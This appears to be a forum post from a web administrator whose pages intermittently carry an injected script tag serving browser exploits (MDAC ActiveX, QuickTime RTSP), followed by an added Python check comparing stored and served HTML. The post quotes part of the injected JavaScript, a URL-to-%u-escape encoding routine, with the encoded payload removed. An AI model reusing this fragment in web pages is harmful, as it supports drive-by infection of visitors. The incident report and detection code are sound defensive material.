Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Component installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting the JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple HTML, PHP, etc.) at times a script tag similar to the one below is inserted right after the <body> tag.
I have checked for the filenames but they do not exist on the server.
1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
Would appreciate if anybody could provide some inputs on what we might be dealing with and how to resolve the problem.
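// URL of a file on the same host as the page being viewed
var MU = "http://" + window.location.hostname + "/" + arg;
// Hex-encode every character of that URL
var MH = '';
for (i=0; i < MU.length; i++)
{
    var b = MU.charCodeAt (i);
    MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
// Pad to an even number of characters
if (Math.round(MU.length/2) != (MU.length/2))
    MH += '00';
// Re-emit the hex as %u escapes, two bytes per unit, byte-swapped
var MR = '';
for (i=0; i < MH.length; i += 4)
    MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";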
var SB =
<<removed encoded exploit>>
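One way to confirm that the tag is being added at serve time rather than stored in the files, given that it only shows up "at times" and the referenced filenames are not on disk. This is an added example, not part of the original post; the function names, sample pages and the `/PLACEHOLDER.js` path are constructed for illustration.

```python
import re

# Opening <body> tag, with or without attributes, in any case.
BODY_OPEN = re.compile(r"<body\b[^>]*>", re.IGNORECASE)
# One complete <script> element, optionally preceded by whitespace.
SCRIPT = re.compile(r"\s*(<script\b[^>]*>.*?</script\s*>)",
                    re.IGNORECASE | re.DOTALL)


def leading_body_scripts(html):
    """Return the <script> elements that sit directly after the opening <body> tag."""
    m = BODY_OPEN.search(html)
    if not m:
        return []
    pos, found = m.end(), []
    while True:
        s = SCRIPT.match(html, pos)
        if not s:
            return found
        found.append(s.group(1))
        pos = s.end()


def _norm(script):
    # Collapse whitespace so formatting differences do not cause false alerts.
    return " ".join(script.split())


def injected_scripts(disk_html, served_html):
    """Scripts right after <body> in the served page that the on-disk file lacks."""
    known = {_norm(s) for s in leading_body_scripts(disk_html)}
    return [s for s in leading_body_scripts(served_html) if _norm(s) not in known]


def flag_responses(disk_html, responses):
    """Indexes of the responses (repeated fetches of one page) that carry an extra script."""
    return [i for i, body in enumerate(responses)
            if injected_scripts(disk_html, body)]


# Constructed samples: the file as stored, and one tampered response.
DISK = '<html><body>\n<script>init()</script>\n<p>hello</p></body></html>'
TAMPERED = ('<html><BODY class="x"><script src="/PLACEHOLDER.js"></script>\n'
            '<script>init()</script>\n<p>hello</p></body></html>')

if __name__ == "__main__":
    print(flag_responses(DISK, [DISK, TAMPERED, DISK]))
```

Feed it the file read from the document root and the bodies of several requests for the same URL; a non-empty result with a clean file on disk means the page is being modified somewhere between the file system and the client.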